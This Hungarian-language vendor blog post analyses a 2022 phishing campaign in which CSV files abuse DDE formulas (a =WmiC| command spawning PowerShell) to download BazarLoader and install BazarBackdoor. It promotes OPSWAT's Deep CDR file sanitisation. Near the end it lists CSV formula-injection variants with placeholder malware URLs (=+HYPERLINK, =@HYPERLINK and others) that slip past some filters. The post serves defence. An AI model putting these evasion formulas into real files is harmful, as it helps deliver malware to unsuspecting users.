2022 februárjában Chris Campbell rosszindulatú szoftverek kutatója egy új adathalászkampányt észlelt, amely speciálisan kialakított CSV (vesszőkkel elválasztott értékek) szövegfájlokat használ, hogy a felhasználók eszközeit megfertőzze a BazarBackdoor trójai vírussal. Ebben a blogbejegyzésben elemezzük a támadási forgatókönyvet, és megmutatjuk, hogyan lehet megelőzni ezt a kifinomult támadást a következőkkel Deep CDR
(Tartalom hatástalanítása és rekonstrukciója).
A támadási taktika
Ebben az adathalász-kampányban a kiberbűnözők egy CSV-fájlt használtak, amely egy olyan szöveges fájl, amely táblázatos formában tárolja az adatokat, és vesszővel választja el az értékeket. Ez a fájltípus népszerű módja az egyszerű adatok adatbázisok és alkalmazások közötti cseréjének. Mivel a CSV fájl egyszerűen csak szöveget tartalmaz, futtatható kód nélkül, sok felhasználó azt gondolja, hogy ártalmatlan, és óvatosság nélkül gyorsan megnyitja a dokumentumot. Nem sejtik, hogy a fájl olyan fenyegetésvektor lehet, amelyen keresztül rosszindulatú szoftverek juthatnak az eszközükre, ha a CSV-fájlt a dinamikus adatcserét (DDE) támogató alkalmazásokkal, például a Microsoft Excel és az OpenOffice Calc alkalmazással nyitják meg. Ezek az alkalmazások képesek a CSV-fájlban lévő képleteket, és függvényeket végrehajtani. A fenyegetések szerzői visszaélnek ezzel a DDE funkcióval, hogy tetszőleges parancsokat hajtsanak végre, amelyek letöltik és telepítik a BazarBackdoor trójai vírust, hogy kompromittálják a vállalati hálózatokat, és teljes hozzáférést szerezzenek az óvatlan áldozat eszközéről. Az MS Office-fájlba rejtett rosszindulatú makróval vagy VBA-kóddal történő népszerű támadási megközelítésekhez képest a DDE-dokumentumokba rejtett fenyegetéseket nehezebb felismerni.
A fájlt alaposan megvizsgálva láthatunk egy =WmiC| parancsot (Windows Management Interface Command) az adatok egyik oszlopában. Ha az áldozatok véletlenül engedélyezik ennek a DDE-funkciónak a futtatását, akkor az egy PowerShell-parancsot hoz létre. A parancs ezután megnyit egy távoli URL-t a BazarLoader letöltéséhez, és a BazarBackdoor települ az áldozat gépére.
Hogyan segít a Deep CDR a DDE-támadások elleni védekezésben?
Az e-mailekhez csatolt fájlok tisztításával megvédheti hálózatát ezekkel a kifinomult adathalászkampányokkal szemben, mielőtt azok eljutnak a felhasználókhoz. Azzal a gondolkodásmóddal, hogy minden fájl potenciális fenyegetést jelent, és a megelőzésre, nem pedig a felderítésre összpontosít, a Deep CDR eltávolítja a fájlok összes aktív tartalmát, miközben a fájlok használhatósága és funkcionalitása megmarad. A Deep CDR a MetaDefender - a OPSWATfejlett fenyegetésmegelőzési platformjának hat kulcsfontosságú technológiájának egyike, amely valóban a Zero Trust filozófiát követi.
Az alábbiakban a fertőtlenítés részleteit mutatjuk be, miután feldolgoztuk a fertőzött CSV fájlt a MetaDefender Core segítségével (A szkennelés eredményéreis hivatkozhat. a MetaDefender Cloud). Deep CDR semlegesítette a fájlban lévő képletet, így nem jött létre PowerShell parancs. A kártevő ezután nem tudott letöltődni.
A hasonló támadásokban a fenyegetések szerzői összetettebb képleteket használnak a felderítés elkerülésére. Az MS Excelben a képletek általában egyenlőségjellel (=) kezdődnek. Mivel azonban ez az alkalmazás az "=" helyett más előjellel, például "=+"-val vagy "@"-val kezdődő képleteket is elfogad, a CSV-fájlokban a romboló képlet lehet:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Az ilyen típusú képletek kikerülhetnek néhány elterjedt CDR-rendszertől. A Deep CDR azonban könnyen kezeli ezt a taktikát, és tiszta, biztonságosan fogyasztható fájlokat ad ki, ezzel semlegesítve a fenyegetést.
Tudjon meg többet a Deep CDR-ről, vagy beszéljen az OPSWAT technikai szakértőjével, hogy megismerje a legjobb biztonsági megoldásokat, amelyekkel megvédheti vállalati hálózatát és felhasználóit a nulladik napi támadásoktól és a fejlett kitérő rosszindulatú szoftverektől.
